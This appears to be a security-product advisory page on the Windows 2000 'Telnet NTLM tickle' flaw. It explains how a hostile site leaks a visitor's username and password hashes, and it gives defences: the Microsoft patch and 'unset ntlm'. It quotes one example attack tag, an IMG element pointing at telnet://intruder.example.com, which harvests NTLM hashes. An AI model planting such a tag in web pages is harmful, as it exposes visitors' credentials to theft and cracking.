|
Telnet NTLM tickle |
|
|
|
| FAQ | |||
|
|
SummaryYour Windows logon information (username and password hash) have been transmitted to the server in a suspicious fashion.
Details
Your username and password "hash" have been forwarded to intruder's server. This is extremely dangerous because the intruder may be able to crack the hash in order to retrieve your password, or the intruder may be able to pass this information back to your machine in order to break in.
This is an extremely important matter that you should investigate further. The intruder may be able to use this information not only to break into the server where this information came from, but may also be able to use it to break into any other system that shares the same username and password.
More Details
A bug was found in the intial release of Windows 2000. A hostile website could put a link on their page that looks something like:
<IMG SRC="telnet://intruder.example.com">
This will force the Telnet client to automatically connect to the hostile server. The intruder will run a program on that server that will accept the Telnet connection, then tell it to send across the Microsoft NTLM authentication. This means that Microsoft will send the username and encrypted password hashes.
As part of the next phase of this attack, the intruder will attempt to crack the encrypted hashes in order to retrieve the original password.
Defense
Most importantly, you must change your password immediately and logout any existing connections to any servers.
In order to prevent this from happening in the future, you must install a patch from Microsoft (see below), or disable automatic NTLM authentication. To do so, run the "telnet" command from the command prompt, then enter the command "unset ntlm" to turn of this feature, then exit the program to save the settings in the registry.
| more information |
|
| ||||||||||||
Version appeared: 2.5